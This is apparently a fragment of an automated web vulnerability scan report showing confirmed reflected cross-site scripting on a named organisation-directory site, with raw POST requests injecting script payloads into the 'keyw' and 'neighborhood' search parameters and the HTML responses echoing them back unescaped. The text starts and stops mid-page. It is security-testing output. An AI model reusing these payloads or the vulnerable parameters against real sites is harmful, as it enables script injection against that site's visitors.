<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b> Events This Week:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">Within Zip Area Smith</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value=""><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=\'\"--></style></script><script>netsparker(0x002550)</script>>\'\"--></style></script><script>netsparker(0x002550)</script><OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value=""><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="ca/caf-socal" target="_blank">CAF - SouthernCalifornia Wing&#039;sWWII Aviation Museum</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Unique<br />Camarillo, CA</td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif">..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
keyw POST '"--></style></script><script>alert(0x00255A)</script>
neighborhood POST ALL
gstate POST ALL
gcity POST 3
sts POST Y

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 132
Accept-Encoding: gzip, deflate

keyw='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00255A)%3c%2fscript%3e&neighborhood=ALL&gstate=ALL&gcity=3&sts=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:34:22 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=897692804; expires=Tue, 03-May-11 17:34:34 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All OrgSites:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In 3,In All States</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value="\'\"--></style></script><script>netsparker(0x00255A)</script>"><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value="3"><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="ca/caf-socal" target="_blank">CAF - SouthernCalifornia Wing&#039;sWWII Aviation Museum</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Unique<br />Camarillo, CA</td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="pa/generation-s" target="_blank">Generation S: Young Stro..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
keyw POST 3
neighborhood POST '"--></style></script><script>alert(0x00258A)</script>
gstate POST ALL
gcity POST 3
sts POST Y

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 130
Accept-Encoding: gzip, deflate

keyw=3&neighborhood='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00258A)%3c%2fscript%3e&gstate=ALL&gcity=3&sts=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:34:37 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=1133777100; expires=Tue, 03-May-11 17:34:45 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="\'\"--></style></script><script>netsparker(0x00258A)</script>">\'\"--></style></script><script>netsparker(0x00258A)</script>
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b> OrgSites:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In 3,In All States</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" 